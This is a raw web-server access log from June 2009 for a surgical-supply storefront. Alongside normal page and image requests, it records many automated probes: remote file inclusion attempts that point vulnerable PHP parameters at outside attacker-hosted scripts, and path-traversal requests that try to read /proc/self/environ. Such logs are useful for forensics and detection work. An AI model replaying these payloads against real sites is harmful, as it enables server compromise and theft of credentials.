75.125.245.26 - - [19/Jun/2009:04:17:50 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:17:50 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:04:18:00 -0400] "GET /logs/error_log.Q107061700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.230.22.39 - - [19/Jun/2009:04:18:12 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
212.88.179.68 - - [19/Jun/2009:04:18:12 -0400] "GET /logs/access_log.Q109052900/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://yagami.altervista.org/id.txt? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
87.230.22.39 - - [19/Jun/2009:04:18:16 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
210.202.194.157 - - [19/Jun/2009:04:18:24 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:26 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:26 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:26 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:26 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:26 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:27 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:27 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:27 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:27 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:28 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:28 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:28 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:28 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:30 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:30 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:31 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:33 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:34 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:35 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:35 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:35 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:35 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
66.249.71.14 - - [19/Jun/2009:04:18:36 -0400] "GET /images/index5_surgscis.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
210.202.194.157 - - [19/Jun/2009:04:18:36 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:36 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:36 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:36 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
216.120.237.150 - - [19/Jun/2009:04:18:37 -0400] "GET /logs/error_log.Q109041400//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 282 "-" "libwww-perl/5.811"
213.33.143.3 - - [19/Jun/2009:04:18:37 -0400] "GET /logs/error_log.Q109041400//component/option,com_registration/task,register/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.jotka-kommunikation.de/images/rss?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
210.202.194.157 - - [19/Jun/2009:04:18:37 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:37 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L109AA9498472D20051CF042+M37+ENG HTTP/1.1" 200 76249 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
209.59.12.99 - - [19/Jun/2009:04:18:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.202.194.157 - - [19/Jun/2009:04:18:46 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L109AA9498472D20051CF042+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:47 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:48 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:54 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
210.202.194.157 - - [19/Jun/2009:04:18:54 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
75.125.245.26 - - [19/Jun/2009:04:18:59 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:19:01 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:04:19:07 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:04:19:07 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:04:19:07 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
118.129.166.10 - - [19/Jun/2009:04:19:17 -0400] "GET /logs/access_log.Q109060900%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:19:52 -0400] "GET /logs//credits.html.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:19:57 -0400] "GET /logs/access_log.Q109051500//credits.html.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.105.207.244 - - [19/Jun/2009:04:20:10 -0400] "GET /logs/access_log.Q109052500//credits.html.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:04:20:57 -0400] "GET /logs/access_log.Q109060100//common/db.php?commonpath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.137.51 - - [19/Jun/2009:04:20:57 -0400] "GET /logs/access_log.Q109050800//common/db.php?commonpath=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:04:21:22 -0400] "GET /logs/access_log.Q108031600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
210.202.194.157 - - [19/Jun/2009:04:22:01 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L109AA9498472D20051CF042+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.1)"
87.230.22.39 - - [19/Jun/2009:04:22:22 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:22:22 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:22:22 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:04:22:41 -0400] "GET /logs/access_log.Q109052900/index.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.223.126.82 - - [19/Jun/2009:04:22:58 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.223.126.82 - - [19/Jun/2009:04:22:58 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.223.126.82 - - [19/Jun/2009:04:23:03 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.223.126.82 - - [19/Jun/2009:04:23:04 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.223.126.82 - - [19/Jun/2009:04:23:04 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.223.126.82 - - [19/Jun/2009:04:23:04 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:04:23:16 -0400] "GET /logs/access_log.Q109051600/index.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:23:18 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:23:18 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:23:23 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:23:35 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:04:23:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [19/Jun/2009:04:23:43 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/dtroy/idscan.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
217.147.29.190 - - [19/Jun/2009:04:23:44 -0400] "GET //modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/dtroy/idscan.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
217.147.29.190 - - [19/Jun/2009:04:23:44 -0400] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/dtroy/idscan.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
123.143.98.5 - - [19/Jun/2009:04:23:55 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:23:55 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:23:55 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:23:56 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:23:56 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:23:56 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.29.190 - - [19/Jun/2009:04:24:02 -0400] "GET /logs/access_log.Q109052100//modules/My_eGallery/index.php?basepath=http://www.c21vox.tv/dtroy/idscan.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
75.125.245.26 - - [19/Jun/2009:04:24:05 -0400] "GET /logs/access_log.Q109052300%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:04:24:26 -0400] "GET /logs/access_log.Q107082600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
69.94.125.100 - - [19/Jun/2009:04:24:29 -0400] "GET /logs/access_log.Q109050900%20%20/rss.php?phpraid_dir=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.94.125.100 - - [19/Jun/2009:04:24:29 -0400] "GET /rss.php?phpraid_dir=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
69.94.125.100 - - [19/Jun/2009:04:24:29 -0400] "GET /logs/rss.php?phpraid_dir=http://www.0118099987.com/board/down/id132_860233/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:25:07 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:04:25:09 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.230.22.39 - - [19/Jun/2009:04:25:15 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kotz.org/images/extras/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:25:34 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
59.92.82.6 - - [19/Jun/2009:04:25:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
59.92.82.6 - - [19/Jun/2009:04:25:39 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
75.125.245.26 - - [19/Jun/2009:04:25:41 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
59.92.82.6 - - [19/Jun/2009:04:25:48 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
59.92.82.6 - - [19/Jun/2009:04:25:48 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
195.34.78.110 - - [19/Jun/2009:04:26:03 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:04:26:05 -0400] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:04:26:05 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
75.125.245.26 - - [19/Jun/2009:04:26:06 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.politicalroundtable.com/plugins/1.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [19/Jun/2009:04:26:07 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.210.89.18 - - [19/Jun/2009:04:26:11 -0400] "GET /logs/access_log.Q109052900/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
207.210.89.18 - - [19/Jun/2009:04:26:11 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
207.210.89.18 - - [19/Jun/2009:04:26:12 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
207.210.89.18 - - [19/Jun/2009:04:26:12 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
207.210.89.18 - - [19/Jun/2009:04:26:12 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 239 "-" "XXXXXX"
207.210.89.18 - - [19/Jun/2009:04:26:12 -0400] "GET /logs/access_log.Q109052900/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 266 "-" "XXXXXX"
